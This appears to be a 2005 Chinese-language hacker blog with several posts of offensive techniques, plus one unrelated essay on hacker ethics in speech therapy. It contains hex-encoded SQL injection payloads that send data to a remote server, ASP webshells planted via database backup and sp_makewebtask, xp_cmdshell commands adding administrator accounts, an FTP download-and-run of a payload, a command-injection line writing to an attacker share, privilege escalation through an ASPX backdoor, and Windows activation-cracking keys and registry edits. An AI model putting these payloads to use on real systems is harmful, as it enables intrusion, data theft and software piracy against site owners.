;DECLARE @S NVARCHAR(4000);SET @S=CAST(0x69006E007300650072007400200069006E0074006F0020006F00700065006E00640061007400610073006F00750072006300650028002700730071006C006F006C0065006400620027002C0027007300650072007600650072003D003200310031002E00310031002E00310031002E00310031003B007500690064003D00730061003B007000770064003D006600750063006B00210021003B00640061007400610062006100730065003D007400650073007400270029002E0074006500730074002E00640062006F002E006B0075002000730065006C0065006300740020006E0061006D0065002000660072006F006D0020006D00610073007400650072002E00640062006F002E00730079007300640061007400610062006100730065007300 AS NVARCHAR(4000));EXEC(@S);
　　直接打開本機資料庫test中的ku表，嘿嘿，成功列出了遠程所有資料庫的名稱。
　　下面來返回伺服器上D盤下的資料夾，嘿嘿，為了求速度，我只列一級資料夾。

　　建一個表;create table temp(id nvarchar(255),num1 nvarchar(255))--成功
　　往表裡插入所有各級數資料夾(一級目錄為D磁碟根資料夾，二級就是下一層，三級依次類推),
語句：
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'D:\'
有單引號，上面的語句肯定不成功，肯定要用declare附值變量，好了，我直接寫語句：
DECLARE @S NVARCHAR(4000);SET @S=CAST(0x69006E007300650072007400200069006E0074006F002000740065006D0070002800690064002C006E0075006D00310029002000650078006500630020006D00610073007400650072002E00640062006F002E00780070005F0064006900720074007200650065002000270044003A005C002700 AS NVARCHAR(4000));EXEC(@S);
那麼現在temp表中，已經有了所有D磁碟的資料夾了，其中num1=1為一級資料夾,num1=2為二級..等等。
好了，我把temp表中一級目錄返回到本機吧
本機建表mulu(name char(255)),遠程語句:
insert into opendatasource('sqloledb','server=10.10.10.1;uid=sa;pwd=tank!!;database=test').test.dbo.mulu select id from temp where num1=1
轉成16進制declare附變量提交，我日~~經過漫長由如死機的時間，失敗了。。。弄不清楚原因。

　　既然懶的方法不行，算了，就勤快一些吧！鬱悶！
　　上述的temp遠程表中還有資料夾名稱呢,太亂，在遠程直接建個新表:
;create talbe temp1(id nvarchar(4000))--
然後把temp表中一級資料夾名稱插到這裡來，
語句:
;insert into temp1(id) select id from temp where num1=1--
　　然後再暴: and 1=(select top 1 id from temp1 where id=1),
提示:xxxxxxxxxxxx'MUbak'轉換為int.....等出錯等訊息，我是不是很懶，連出錯訊息都不複製？明白就行了。
　　暴下一個資料夾不可能用 and 1=(select top 1 id from temp1 where id not in('MUbak'))吧？因為裡面有單引號呀,不是上面說可以用declare嗎?錯!這是暴,可不是執行命令呀，不要弄錯！

　　抽了一根煙，想了想，還有一個辦法，再把temp1的目錄一層一層地扒下來，把他們傳遞給temp2表,呵呵，肯定要先建表了
;create table temp2(id char(255))--。
　　先想明白語句，我把temp1的id下所有的名稱，給於temp2，而且不包括'MUbak'目錄，那麼語句應該是:
insert into temp2(id) select id from temp1 where id not in('MUbak')
呵呵，有單引號，declare!!!，上面語句轉16進制。
語句為:
DECLARE @S NVARCHAR(4000);SET @S=CAST(0x69006E007300650072007400200069006E0074006F002000740065006D007000320028006900640029002000730065006C006500630074002000690064002000660072006F006D002000740065006D007000310020007700680065007200650020006900640020006E006F007400200069006E00280027004D005500620061006B0027002900 AS NVARCHAR(4000));EXEC(@S);
　　這時，我在temp2暴表:and 1=(select top 1 id from temp2)，提示xxxxxxxxxxxx'wwwbak'轉換為int.....等出錯等訊息。。呵呵，又一個目錄出來了。
　　然後刪表temp2表，建temp3表，用上面的訪法循環暴出下一個目錄。
　　可能有人問，為什麼要建temp3表，直接刪掉temp2，然後再建temp2再用呀，不過經驗認為，這裡最好新建一個，本人認為是緩存的原因，否則一直用老表，暴錯的訊息為同一個。。。。

　　好了，經過漫長的時間，終於找出了網站的目錄為D:\web\www\，下來備份唄。
;create table riri(ri char(255))--
;insert into riri(ri) values(0x3C25657865637574652872657175657374282261222929253E)-- '0x3C25657865637574652872657175657374282261222929253E"為<%execute request("a")%>
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x443a5c7765625c7777775c312e617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT
'0x443a5c7765625c7777775c312e617370為D:\web\www\1.asp
這時成功得在網站目錄備分了一個1.asp，訪問www.xxx.com/1.asp 出現'execute'錯誤，呵呵，一個webshell到手了。
看得很麻煩吧，如果有人做出工具來了就簡單多了，否則累死你~~

Windows 2003 無法上網自動更新

tank@tank.tw(tank) — Tue,20 Dec 2005 22:38:50 +0800

當然說的是破解的方法

請看這篇文章。

7步搞定Windows2003 Update（54powerman原創）
原文：http://blog.csdn.net/54powerman/archive/2004/08/23/82246.aspx
1、導入1.reg；
2、執行2.bat，選擇“是，我想打電話給顧客服務代表來激活Windows(T)”，點擊“下一步”；
3、點擊“更改產品密鑰”按鈕；
4、輸入如下密鑰後，點擊“更新”按鈕，然候“在此之後提醒我”按鈕；
注：
企業版(EnterpriseEdition)：JCGMJ-TC669-KCBG7-HB8X2-FXG7M
標準版(StandardEdition)：KCDJP-2FVBQ-J82BP-VWG8Y-TW3HM
5、導入3.reg；
6、立即執行Update；
7、完成。

文件內容：

文件1.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]
"OOBETimer"=hex:ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff

文件2.bat

%windir%\system32\oobe\msoobe.exe /a

文件3.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]
"OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33,93,fd

絕處逢生—Windwos 2003下的權限提升

tank@tank.tw(tank) — Tue,13 Dec 2005 17:30:12 +0800

絕處逢生——Windwos 2003下的權限提升

前幾天滲透了某大型網站，興奮中。拿到WebShell後，第一個念頭就是提升權限，把偶親愛的候門掛到系統里。熟練的打開CMD，輸入NET USER。
不是好兆頭，接著在WSCRIPT組件前打鉤，再次執行NET USER。
提示倒是換了，但是結果一樣。接著偶想到了上傳CMD.EXE，但是Windows 2003的上傳在默認時是有限制的，不能大於200K，於是我上傳了經典的Serv-U本地溢出程序，使用在Windows 2000下沒有禁用WSCRIPT時的無敵調用提權大法。
其實就是在調用CMD的地方寫上本地溢出程序的路徑及參數，一般在沒有禁止WSCRIPT組件時，此法的成功率很高。但是結果依然是“禁止訪問”，看來Windows 2003在默認情況下，安全性比Windows 2000默認時要強許多。失望之余，想到乾脆去首頁掛個馬吧，最近正在玩PcShare，嘿嘿。跑到首頁，加入偶的木馬代碼，點保存，“沒有權限”，偶倒！太BT了吧？連修改首頁的權限都沒？管理員一定是把IIS用戶降低到了GUEST組，或者給IIS目錄單獨設置了一個GUEST組的用戶，並去掉了修改文件的權限。上帝太不公平了，怎么說都是偶辛辛苦苦搞來的Shell啊，現在一點用都沒有！
沒辦法，看看服務器里有啥好東西吧。翻來翻去，忽然眼前一亮：在某個目錄裡發現了congif.aspx文件。寫到這里各位以為偶是要使用SA帳號，通過SQLROOTKIT執行系統命令吧？錯，偶看過了，帳號不是SA權限的，是PU權限，什麼都不能做，而且也不屬於本文的介紹範圍。偶注意的“ASPX”這個後綴，在默認安裝情況下，IIS 6.0是支持.net的，也就是ASPX文件，但是在IIS 6.0里，ASP和ASPX兩個擴展使用的卻是2個不同的用戶角色，ASP使用的是IUSER用戶，管理員一般都比較注意這個帳號，害怕被提升權限，所以把權限都降低到了GUEST，所以在ASP的WebShell里什麼不能做了。但是網管往往忽略了ASPX！由於.net使用的系統賬號是ASPNET，而在默認情況下，這個賬號是屬于USER組的，這樣我們上傳一個.NET的後門上去，會以USER組的用戶ASPNET執行命令，權限會有很大的提高，就可以提權了！
說做就做，立即上傳了一個ASPX的后門上去，打開CMD模塊執行NET USER。
哇哈哈，果然不出偶所料，終於可以執行CMD了！來看看權限，輸入“net localgroup guests”。
看到了吧？剛才我們在AspWebShell中使用的帳號是IUSER_WEBSITE，屬於GUESTS組，難怪什麼權限都沒有呢。再來看一下USERS組。
ASPNET就是現在我們的AspxShell使用的帳號，權限是USERS，比Guest大好多，嘿嘿！
其實這并不算是什麼漏洞，只是由於管理員粗心大意造成的隱患而已。算是提升權限的一個思路吧。如果管理員把ASPNET也降低權限，或者刪除ASPX這個擴展，本文的方法就不管用了，不過這樣的管理員到目前我還沒遇到過。總之，整體安全才是最重要的。不要放過每一個細節。

作者：放手來源：《黑客防線》

最簡單有效的提權方法的小技巧

tank@tank.tw(tank) — Tue,13 Dec 2005 03:59:50 +0800

最簡單有效的提權方法的小技巧

大家都知道最長用的幾種權限提升方法
我們主要說一下利用autorun .inf或desktop.ini，
這種方法有很大的局限性，必須管理員打開目錄或文件夾，現在國內的有些管理員不知道猴年馬月才登陸伺服器一次，成功率不是太高!
我們來講一下，怎麼主動利用這個方法desktop.ini提升權限!

我在本機器上個大家演示:
我們首先創建個 guests的用戶命令:runas /user:admin cmd.exe
現在就是guests權限，我們來看一下看到了麼
現在我們建立一個有自定義文件
我現在是在本機操作，大家用webshell的時候可是把最後的兩個文件上傳到一個有運行權限的目錄裡面

我們隨便選個地址

會產生兩個文件一個文件夾 desktop.ini ，Folder Settings（目錄）Comment.htt
Comment.htt文件存的就是剛才修改的那些訊息
可以自己修改，就是網頁代碼
如果看不到這幾個文件的話，可以把隱藏受保護的操作系統文件前面的對號給取消
和顯示所有文件前的對號取消就能看到啦
現在繼續
為了方便大家看效果，我把大小改為100 ，OK我現在沒有上網，所以出現這個頁面
好了，我們吧這兩個頁面上傳到可以運行的文件佳裡面
先放到C:\WINNT\system32\inetsrv\Data 這個目錄裡面，大家可以自己找，只要能有運行的權限就行啦

OK好了，大家可以在本地設置好再上傳上去，

OK現在我們用guests的權限打開這個目錄，哈哈，這樣不就同時打開這個網頁啦，
我們在網頁掛上木馬，或者掛個.bat，建立個管理員帳號
命令:start C:\WINNT\system32\inetsrv\Data
呵呵已經打開，我們關了再試一下
看到了麼，用guests權限打開目錄，，
這樣做的網頁木馬就運行啦，，，，呵呵，，，控制肉雞啦
好了，其實很簡單，只要大家多多注意就能發現很多有用的小技巧，

SQL注入建立虛擬目錄，免得找Web絕對路徑！

tank@tank.tw(tank) — Mon,12 Dec 2005 02:34:34 +0800

SQL注入建立虛擬目錄，免得找Web絕對路徑！
我們很多情況下都遇到SQL注入可以列目錄和運行命令，但是卻很不容易找到web所在目錄，也就不好得到一個webshell，這一招不錯：

exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
建立虛擬目錄win,指向c:\winnt\system32
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
讓win句有解析asp腳本權限

exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"
刪除虛擬目錄。
找不到web絕對路徑的一種解決辦法，
http://hacker.tank.tw/hello
403錯誤，表示虛擬目錄建好了。。。

聽語專業的黑客觀

tank@tank.tw(tank) — Mon,12 Dec 2005 02:25:21 +0800

聽語專業的黑客觀
作者：Jedi

在媒體的報導中，黑客 (Hacker) 往往被當成是負面的字眼，用來指稱入侵或破解他人電腦系統的人，然而這一直是一種誤用：入侵或破解他人電腦系統的人其實應該被稱做鬼客 (Cracker) 。根據夾槓檔案 (The Jargon File) 裡的說法，黑客指的是「擅長於特殊領域、具有積極主動的研究精神，而且樂於助人」的人。

很重要的一點是，「黑客」一詞並不囿於資訊科學的範疇，不管是在甚麼領域，祇要某人符合上述的條件，那麼我們就可以稱她為「黑客」。於是可以有天文黑客、鋼琴黑客、化學黑客、社會學黑客、文化黑客、傳播黑客等等不同的可能性，當然也可以有聽力學黑客跟語言並理學黑客。

在「黑客倫理與新資本主義精神」這本書裡，提到了這類人（黑客）對時間支配的新看法。妳會發現這類人總是樂於把時間投注在她們所感興趣的事物上，而這些事物正是她們所擅長的領域，於是她們成就非凡。

無論是語言治療師或聽力師，都是需要有極大熱誠跟興趣，纔能長久做下去的職業。這是我在踏入這個領域之前，學長姐所告誡的話，我也常常拿來告誡學弟妹。事實上我相信多數的醫療專業也都是如此。

因為這個領域的工作可以說是繁瑣而複雜，如果沒有主動探索的精神，恐怕會覺得日復一日都在做一模一樣的事；如果沒有與人討論分享的習慣，更是鮮少會有能讓妳學習成長的機會。實際接觸過個案的人祇要用點心就會發現，這個領域的精髓就在於細膩地觀察個案的反應及互動，無論對語言治療師或聽力師皆然；而這正是需要纖細的心思和靈巧的手法，纔能夠掌握自如的。

現代人的生活步調往往過於急促，許多人工作就祇為了餬口飯喫，實在是相當可惜。傳統市集的觀念中，執業者往往會為了要爭奪市場而藏私或互相攻擊；這麼一來其實祇是對這片領域的慢性扼殺罷了。長久之後誰也拿不到好處。

而在黑客倫理的觀點中，對知識共享的強調，以及對工作的熱情，私以為是非常彌足珍貴的。黑客們往往會日以繼夜地克服眼前遇到的問題，她們行事清晰有條理，而且往往會留下完整的紀錄，事後並且樂於與他人分享這樣的經驗。

當越多人把心力投注在公領域 (Public Domain) 時，公領域也越能幫助單獨的個人面對她所未曾遭遇的狀況。智慧跟知識在這種情況下才得以累積，於是我們毋須一再地重新發明輪子，而能夠站在巨人的肩膀上瞭望世界大千。

身為一個聽語專業人員，妳不祇應該在臨床上展現妳的技藝，更應該（強迫上司）留給自己一些反芻的空檔。妳應該養成從個案身上思考的習慣 ─ 我說的可不是病例報告，我在這裡所要強調的是跨越單一專業領域的心胸和視野。

當妳面對眼前的個案時，妳確切地瞭解她的生活經驗、她的家庭環境、她的處心積慮、她的渴求和她的憂傷快樂嗎？如果妳沒有花時間去同理她的內心細節，妳又怎能確定自己做的處置真的是滿足了個案（而不是祇是在滿足自己）的需求？

做這些事得花費相當大量的精力，妳會做一些外人難以看到的事情，在這個過程中妳與個案雙方都會有機會去看清楚整件事的關鍵點，然後做出決定，並且學習而成長。每一次處理不同的個案時，帶來的都會是獨一無二的經驗。每個個案各有其不同的文化、家庭、社會、經濟背景，她們的出發點與切入點不同，動機跟期待也不同。如何能夠明辨這之間的微妙變化，正是整件事的有趣之處。

遇到讓妳喜歡的事，恐怕妳會巴不得這件事永遠不要結束。如果今天有股有形或無形的力量，一直逼著妳趕快把事情作個結束，那妳又怎麼可能會喜歡呢？

所以我說，妳得愛妳的工作。不祇是樂於從事，更要樂於分享。當妳開始觀察、分享這些可愛人們的內心變化時，妳將會發現週遭也開始產生了有趣的變化。妳的個案進步的速度會變快，而同業間也會產生一股互相激盪的氣息。妳珍惜著個案的每一次感動，那麼個案也會珍惜妳的每一分付出；妳越是無私地把所學傳播給其他人，其他人也將更樂於把更新的消息轉達給妳。

這就是「黑客圈」裡會發生的事：相互激盪交織的燦爛回饋。妳毋須勸誘其他人該怎麼做，就祇要爆發妳純真的熱情與活力，逐漸地就能夠推波助瀾。

踏入這個領域時，不祇要為自己、更要為其他人做些甚麼；因為整體的進步纔叫進步、纔是個案的幸福。我以此自勉。

Acunetix Web Vulnerability Scanner

tank@tank.tw(tank) — Mon,12 Dec 2005 01:21:44 +0800

Acunetix Web Vulnerability Scanner

可以掃瞄ASP,ASPX,PHP,JSP等網頁漏洞,還可以實施以下幾種攻擊:

SQL injection attacks
PHP injection attacks
CRLF injection attacks
Code execution attacks
Directory traversal attacks
File inclusion attacks
Input validation attacks
Authentication attacks
Google Hacking attacks
HTTP Sniffer attacks

下載地址：http://www.easy321.com/deleted/pc/vulnerabilityscanner3.exe

並可以生成網頁模式的報告,十分強大,可惜是E文的,並且要註冊,找遍全球了都沒找到誰破解了,希望高手把他破解了,這東西太好了...

How to execute system command in MSSQL

tank@tank.tw(tank) — Tue,17 May 2005 22:28:46 +0800

How to execute system command in MSSQL

注:很有用的老文章,作收集用

假設一台主機開了1433埠我們已通過SQL注入或是空弱密碼遠程連接
能有哪些辦法加一個系統管理員用戶呢(或是執行系統命令)

1).XP_CMDSHELL 'cmd.exe /c net user aaa bbb /add'
人人都知道的辦法,最大的好處是有回顯,但是最怕

if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO

通過上面的T-SQL語句就可以把這個擴展儲存刪了

我們一般可以用
2k:
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
SQL97:
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xpsql70.dll'

就還原了.

但是有的人知道sp_addextendedproc也只不過是一個儲存過程一樣可以刪除的

Drop PROCEDURE sp_addextendedproc
if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO

還原:
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
/*
** Create the extended procedure mapping.
*/
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO

唉呀呀寫了這麼多其實有個最簡單的保護辦法:
先NET stop mssqlserver,然後把xplog70.dll(SQL97下用xpsql70.dll)刪了
再把服務打開就可以了

2)
看了上面的你就明白了xp_cmdshell最終是可以被刪除的，沒別的辦法了嗎?
有寫註冊表三:
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentversion\run', 'czy82','REG_SZ', net user czy bb /add

其實註冊表還有好幾個地方可以寫的比如說註冊表中的WEB瀏覽設置
用寫註冊表的辦法不好的地方是不但沒有回顯而且不能馬上運行，實不實用我也不知道了

3)
declare @s int
exec sp_oacreate "wscript.shell",@s out
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo open asp.7i24.com>c:\a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo 123321>>c:\a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo 123321>>c:\a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo get server.exe>>c:\a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo close>>c:\a.txt"
--exec sp_oamethod @s,"run",NULL,"cmd.exe /c ftp -s:c:\a.txt"
exec sp_oamethod @s,"run",NULL,"cmd.exe /c server"

對了正如你看到的我們還可以使用sp_oacreate和sp_oamethod，在它們的作用下我們可以
調用系統的控件比如說fso,wsh,shell什麼的,但是有個問題是並不能像xp_cmdshell那樣
馬上看到結果，真的不能嗎看下面的:

declare @s int,@o int ,@f int,@str nvarchar(4000)
/*exec sp_oacreate "wscript.shell",@s out
exec sp_oamethod @s,"run",NULL,"cmd.exe /c net user>c:\temp.txt"*/
exec sp_oacreate "scripting.filesystemobject", @o out
exec sp_oamethod @o, "opentextfile", @f out,"c:\temp.txt", 1
exec sp_oamethod @f, "readall",@str out
print @str

先執行註解內的然後執行外面的其實原理很簡單就是利用>把結果寫到一個文件中然後用
fso來讀出來!很實用的

------------------------------------------
寫到這兒該作個總結了上面三個辦法可能大家都知道吧
下面的可能知道的人就少了
------------------------------------------

4)
use msdb; --這兒不要是master喲
exec sp_add_job @job_name='czy82';
exec sp_add_jobstep @job_name='czy82',@step_name = 'Exec my sql',@subsystem='CMDEXEC',@command='dir c:\>c:\b.txt';
exec sp_add_jobserver @job_name = 'czy82',@server_name = 'smscomputer';
exec sp_start_job @job_name='czy82';

利用MSSQL的作業處理也是可以執行命令的而且如果上面的subsystem的參數是tsql，後面的我們就可以
執行tsql語句了.
對於這幾個儲存過程的使用第一在@server_name我們要指定你的sql的服務器名
第二系統的sqlserveragent服務必須打開(默認沒打開的氣人了吧)
net start SQLSERVERAGENT

對於這個東東還有一個地方不同就是public也可以執行..同這兒也是有系統洞洞的看下面的
USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL',
@enabled = 1,
@description = 'This will give a low privileged user access to
xp_cmdshell',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
@step_name = 'Exec my sql',
@subsystem = 'TSQL',
@command = 'exec master..xp_execresultset N''select ''''exec
master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
@server_name = '你的SQL的服務器名'
EXEC sp_start_job @job_name = 'GetSystemOnSQL'

不要懷疑上面的代碼，我是測試成功了的!這兒我們要注意xp_execresultset就是因為它所以
才讓我們可以以public執行xp_cmdshell

5)關於Microsoft SQL Agent Jobs任意文件可刪除覆蓋漏洞(public用戶也可以)
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968

USE msdb
EXEC sp_add_job @job_name = 'ArbitraryFileCreate',
@enabled = 1,
@description = 'This will create a file called c:\sqlafc123.txt',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'ArbitraryFileCreate',
@step_name = 'SQLAFC',
@subsystem = 'TSQL',
@command = 'select ''hello, this file was created by the SQL Agent.''',
@output_file_name = 'c:\sqlafc123.txt'
EXEC sp_add_jobserver @job_name = 'ArbitraryFileCreate',
@server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'ArbitraryFileCreate'

如果subsystem選的是:tsql，在生成的文件的頭部有如下內容

??揂rbitraryFileCreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
----------------------------------------------
hello, this file was created by the SQL Agent.

(1 ?????)

所以我建議要生成文件最好subsystem選cmdexec,如果利用得好我們可以寫一個有添加管理員
命令的vbs文件到啟動目錄!

6)關於sp_makewebtask(可以寫任意內容任意文件名的文件)
關於sp_MScopyscriptfile 看下面的例子
declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command='dir c:\ > "\\attackerip\share\dir.txt"'
select @scripfile='c:\autoexec.bat > nul" | ' + @command + ' | rd "'
exec sp_MScopyscriptfile @scripfile ,''

這兩個東東都還在測試試喲
讓MSSQL的public用戶得到一個本機的web shell:)

sp_makewebtask @outputfile='d:\sms\a.asp',@charset=gb2312,
--@query='select '''''
--@query='select ''<%response.write request.servervariables("APPL_PHYSICAL_PATH")%>'' '
@query='select ''
<%On Error Resume Next
Set oscript = Server.CreateObject("wscript.SHELL")
Set oscriptNet = Server.CreateObject("wscript.NETWORK")
Set oFileSys = Server.CreateObject("scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <>"")Then
szTempFile = "C:\" & oFileSys.GetTempName()
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
End If %>

 
<% If (IsObject(oFile))Then 
On Error Resume Next 
Response.Write Server.HTMLEncode(oFile.ReadAll) 
oFile.Close 
Call oFileSys.DeleteFile(szTempFile, True) 
End If%> 
 '''